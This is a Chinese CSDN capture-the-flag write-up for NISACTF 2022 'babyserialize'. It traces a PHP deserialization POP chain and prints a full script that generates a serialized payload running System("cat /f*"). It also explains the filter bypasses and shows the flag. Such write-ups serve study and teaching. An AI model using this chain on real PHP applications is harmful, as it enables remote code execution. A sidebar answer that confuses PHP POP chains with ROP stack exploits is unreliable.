[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)

最新推荐文章于 2024-06-02 21:39:34 发布
最新推荐文章于 2024-06-02 21:39:34 发布
阅读量1.4k 收藏 21
点赞数 18
分类专栏: PHP web 文章标签: php 反序列化漏洞 pop链构造 脚本编写 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/131565599
版权
web 同时被 2 个专栏收录
128 篇文章 15 订阅
订阅专栏
PHP
34 篇文章 1 订阅
订阅专栏

目录

一、理清pop链并进行标注

二、如何编写相关脚本

三、过滤与绕过

1、waf的绕过

2、preg_match的绕过

做这道题作为pop链的构造很典型,也很有意思,因为还存在一些其他东西。

打开链接,这种很多类的PHP代码多半是需要构造pop链

一、理清pop链并进行标注

 先找eval、flag这些危险函数和关键字样(这就是链尾),找到eval函数,且参数是txw4ever

 

我们可以利用这个txw4ever,来调用系统函数实现命令执行

OK,下面开始教你们做标注

首先我们找到第一步用到的参数所在位置,并在后面标注清楚需要传入的内容

1可以理解为第一步,shell表示我们这里需要传入一个类似shell的东西或者用system标注

传给谁就标注在谁的后面,这里表示要传给txw4ever,而txw4ever是在NISA类下

标注好后,我们回到PHP源码,往eval上面看,发现需要触发__invoke()函数

__invoke是对象被当做函数进行调用时就会触发,我们去找类似$a()这种的(所有类里面找)

找到$bb(),它对应的参数是su,且在类Ilovetxw里

同理我们进行标注,表示要调用参数su,传入NISA类

 

标注好后,我们回到PHP源码,往bb上面看,发现需要触发__toString()函数 

__ToString⽅法是当对象被当做字符串的时候会自动调用

继续在所有类里面找,找到strtolower函数,该函数是将字符串转换成小写

 对应参数 a ,在four类里,我们找到a的位置继续进行标注

因为这里还存在一个if的判断语句,需要符合才能执行后面语句,所有还需要给fun也赋值

因为fun是私有变量,我们最好直接在类里面修改

原来$fun='abc'; 将它修改为下图所示

回到PHP源码,继续往上我们找到__set函数

__set是对不存在或者不可访问的变量进行赋值就会自动调用

于是我们找到huang,我们可以看到在Ilovetxw类里面并不存在fun这个参数

同样进行标注

 

后面我就不详细理下去了,相信你们已经明白了

(不懂的欢迎私信我,可以给你们一对一慢慢详细讲解)

依次往上追到__call函数,__call是对不存在的方法或者不可访问的方法进行调用就自动调用

找到nisa,该类中并不存在这个方法,再往上就找到wakeup函数, 即我们的链头了

该函数在使用unserilize之前就会触发。

以及相关的标注:

我都感觉我讲得太详细了,听懂了的评论区扣个666

至此,我们理清了pop链,并进行了传参的相关标注

二、如何编写相关脚本

先将所有类复制下来放进VS(前面加上<?php)

在这些类后面,我们开始写脚本,我先将完整的能跑出flag的脚本给大家:

<?php

class NISA{
    public $fun="show_me_flag";
    public $txw4ever; // 1 shell
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext; //5 Ilovetxw
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang; //4 four
    public $su; //2 NISA

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER"; //3 Ilovetxw
    private $fun='sixsixsix'; //fun = "sixsixsix

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}


$n = new NISA();
$n->txw4ever = 'System("cat /f*");';
$n->fun = "666";
$i = new Ilovetxw();
$i->su = $n;
$f = new four();
$f->a = $i;
$i = new Ilovetxw();
$i->huang = $f;
$t = new TianXiWei();
$t->ext = $i;
echo urlencode(serialize($t));

我们就根据刚才标注的12345顺序来写,用到哪个类时,必须先用new实例化一遍

(哪怕重复用到了某个类,也需要重新实例化一遍,比如上面的Ilovetxw类)

给大家开个头吧,我们先用到NISA类,所以实例化NISA类:$n = new NISA();

$n->txw4ever表示调用这个类里面的txw4ever,后面传入我们想要传入的内容即可

至于为什么改fun的值,我们后面再说;

至此我们完成了1步骤,继续往下看,来到2

我们用到Ilovetxw类,将其实例化,同理根据标注进行调用传参即可

这样我们就可以写出后面所以的脚本了

三、过滤与绕过

这里存在两个需要绕过的地方,源码有给提示

1、waf的绕过

这里有一个hint函数,触发就会输出一些提示的东西

找到hint函数位置,在第一个类,如何绕过这个函数 ,只需让if语句判断不成立即可

所以你现在知道为什么前面我们需要修改fun的值了吧。

如果没有改fun的值,你只能得到一个提示,flag在根目录

 

2、preg_match的绕过

preg_match用来进行正则匹配,但没给匹配的内容,用的......,暗示我们存在关键字的过滤,

这里system被过滤掉了,如果我们原封不动的使用system,不出意外会返回 something wrong

OK,就不跟大家唠叨了,咱直接拿flag

 NSSCTF{eaa7fba4-17d4-4f17-ad15-38f20c0bf961}

 

Myon⁶
关注
  • 18
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 15
    评论
专栏目录
[NISACTF 2022]babyserialize - 反序列化(waf绕过)【*】
oZuoShen123的博客
10-07 963
1、分析条和属性   条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
关于ctf反序列化题的一些见解([MRCTF2020]Ezpop以及[NISACTF 2022]babyserialize
whale_waves的博客
12-14 1237
这里对php反序列化做简单了解 在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。 serialize()函数序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变 如果想要将已序列化的字符串变回 PHP 的值,可使用用unserialize() 当在反序列化后不同的变量和引用方法会调出不同的php魔法函数 php魔法函数 __wakeup():在执行unserialize时,会最先调用这个函数 __sleep():在执行serialize
pop构造 [NISACTF 2022]babyserialize
m0_75178803的博客
02-26 1061
打开题目题目源代码如下代码审计一下//定义了一个名为NISA的类//检查$this->fun是否等于 "show_me_flag",如果是,则调用hint()函数hint();//当对象的方法不存在时,__call()$from表示调用的方法名,$val是一个数组,包含调用方法时传递的参数//将对象的属性$this->fun设置为传递给方法的第一个参数的值,即$val[0]return " ";//使用echo语句输出对象的属性。
php反序列化——pop构造[SWPUCTF 2021 新生赛]pop [NISACTF 2022]babyserialize
m0_73756016的博客
03-27 786
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的条是(反推)
CTF-php反序列化入门进阶
Mssqj的博客
02-22 411
如果一个类中定义了__get()方法,那么当我们试图获取该类的一个不存在或无法访问的属性时,该方法会被自动调用,从而可以对该操作进行处理。类中)去找$a()这种形式的,,找到$bb(),它对应的参数是su,且在类llovetxm里 特征 $*****();首先找切入点-------找到NISA类invoke的eval()函数,并且参数可控,则思路正确,这是一个正确的方向。shell写flag.php就不对了,然而写/flag时就对了,很奇怪,所以不出答案时,多试一试,改一改。,同样改为上一个类的对象。
[NISACTF 2022]babyserialize
m0_61155226的博客
05-31 336
(1)eval反推到__invoke这里先看到eval,而eval中的变量可控,所以肯定是代码执行,而eval又在__invoke魔术方法中。__invoke魔术方法是对象被当做函数进行调用的时候所触发这里就反推看哪里用到了类似$a()这种的。(2)__invoke反推到__toString在Ilovetxw类的toString方法中,返回了return $bb;__ToString方法,是对象被当做字符串的时候进行自动调用(3)__toString反推到__set。
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2345
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():反序列化的时候,或者对象销毁的时候调用 __wakeup():反序列化的时候调用 __sleep():序列化的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
[NISACTF 2022]上
qq_62046696的博客
07-26 3430
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
POP与ECOSTEP伺服驱动器通信说明
03-20
POP与ECOSTEP伺服驱动器通信说明.pdf 介绍了关于POP与ECOSTEP伺服驱动器通信说明的详细说明,提供伺服系统的技术资料的下载。
POP与日立MICRO-EH系列PLC通信说明
03-19
POP与日立MICRO-EH系列PLC通信说明.pdf 介绍了关于POP与日立MICRO-EH系列PLC通信说明的详细说明,提供日立的技术资料的下载。
Nginx优化与防盗实践教程
02-25
Nginx是俄罗斯人编写的十分轻量级的HTTP服务器,Nginx,它的发音为“engineX”,是一个高性能的HTTP和反向代理服务器,同时也是一个IMAP/POP3/SMTP代理服务器.Nginx是由俄罗斯人IgorSysoev为俄罗斯访问量第二的...
辞郁POP打印工具(2022-01-07)
12-23
辞郁POP工具主要用于:打印零售软件中商品POP促销单。 本程序使用于:思迅软件、科脉软件、百威软件、泰格软件、嬴通软件等。 安装配置完连接参数后,用默认管理员账号:辞郁,密码:ciyu登录,主界面左上角,双击...
[NISACTF 2022]
snowlyzz的博客
09-09 5894
NISACTF部分WP
CTF-PHP反序列化漏洞4-实例理解POP(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2184
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
NSSCTF web题记录
m0_64815693的博客
11-08 9398
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSSCTF web学习
akxnxbshai的博客
09-30 1180
NSSCTF web刷题
深入理解Linux网络总结
最新发布
weixin_45673259的博客
06-02 853
在硬中断的处理中,发起软中断的时候是基于当前CPU核的smp_processor_id的,这意味着哪个核响应的硬中断,那么该硬中断发起的软中断任务就必然由这个核来处理。不过硬中断的上下文里做的工作很少,将传过来的poll_list添加到CPU变量softnet_data的poll_list里(softnet_data中的poll_list是一个双向列表,其中的设备都带有输入帧等着被处理),接着触发软中断NET_RX_SOFTIRQ。服务端响应的第一次握手的时候,会进行半连接队列和全连接队列满的判断。
帮我写一个pop构造
05-05
首先,让我们回顾一下pop的概念:pop是一种利用栈溢出漏洞来实现任意代码执行的攻击手段。它的基本思路是:通过构造一条ROP,将栈中的返回地址覆盖成pop指令的地址,从而将攻击者控制的地址弹出栈顶,进而实现任意代码执行。 下面是一个简单的pop构造示例,假设目标程序存在一个栈溢出漏洞,攻击者想要利用该漏洞实现任意代码执行: ```python # pop构造示例 # pop rdi; ret指令的地址,用于将下一个参数送入rdi寄存器 pop_rdi_ret = 0x4006b3 # system函数的地址,用于调用system函数执行shell命令 system_addr = 0x7ffff7a52390 # /bin/sh字符串的地址,用于作为system函数的参数 bin_sh_addr = 0x7ffff7b97018 # 构造pop pop_chain = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr) # 将pop_chain写入溢出的缓冲区,覆盖返回地址 payload = b'A' * 32 + pop_chain # 触发栈溢出漏洞,执行pop ``` 在这个示例中,我们构造了一条包含三个指令的pop,分别是pop rdi; ret、system和/bin/sh字符串的地址。通过将pop_chain写入溢出的缓冲区,我们可以覆盖返回地址,从而让程序跳转到pop rdi; ret指令的地址,执行pop rdi指令将/bin/sh字符串的地址送入rdi寄存器,再执行ret指令弹出栈顶,跳转到system函数的地址,最终调用system函数执行shell命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值